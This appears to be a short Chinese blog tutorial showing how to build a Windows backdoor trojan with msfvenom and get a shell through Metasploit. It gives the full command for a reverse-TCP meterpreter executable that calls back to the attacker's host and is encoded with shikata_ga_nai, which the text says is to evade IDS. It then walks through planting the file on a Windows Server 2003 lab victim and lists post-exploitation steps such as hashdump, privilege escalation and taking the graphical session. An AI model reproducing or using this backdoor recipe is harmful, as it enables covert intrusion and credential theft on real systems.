【原创】通过MSFVenom生成exe后门木马拿shell

工具:msfconsole、msfvenom、Kali Linux

角色分配:攻击者:Kali Linux 2016.1,IP 192.168.1.106;

受害者:Windows Server 2003,IP 192.168.1.101。

思路:通过msfvenom制作exe后门木马,并用shikata_ga_nai编码绕过IDS检测,利用msfconsole连接msfvenom服务并拿shell。

过程:

1.执行以下命令:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe

【原创】通过MSFVenom生成exe后门木马拿shell_第1张图片

2.将test.exe复制到受害者主机上

【原创】通过MSFVenom生成exe后门木马拿shell_第2张图片

3.在Kali中输入msfconsole,并按照下图进行配置:

【原创】通过MSFVenom生成exe后门木马拿shell_第3张图片

4.执行exploit,然后在受害者主机上运行test.exe后门木马,Metasploit接到反馈:

【原创】通过MSFVenom生成exe后门木马拿shell_第4张图片

得到meterpreter后,可以执行getuid、hashdump以及提权操作,还可以通过getgui命令拿受害主机的图形界面。

【原创】通过MSFVenom生成exe后门木马拿shell_第5张图片

你可能感兴趣的:(【原创】通过MSFVenom生成exe后门木马拿shell)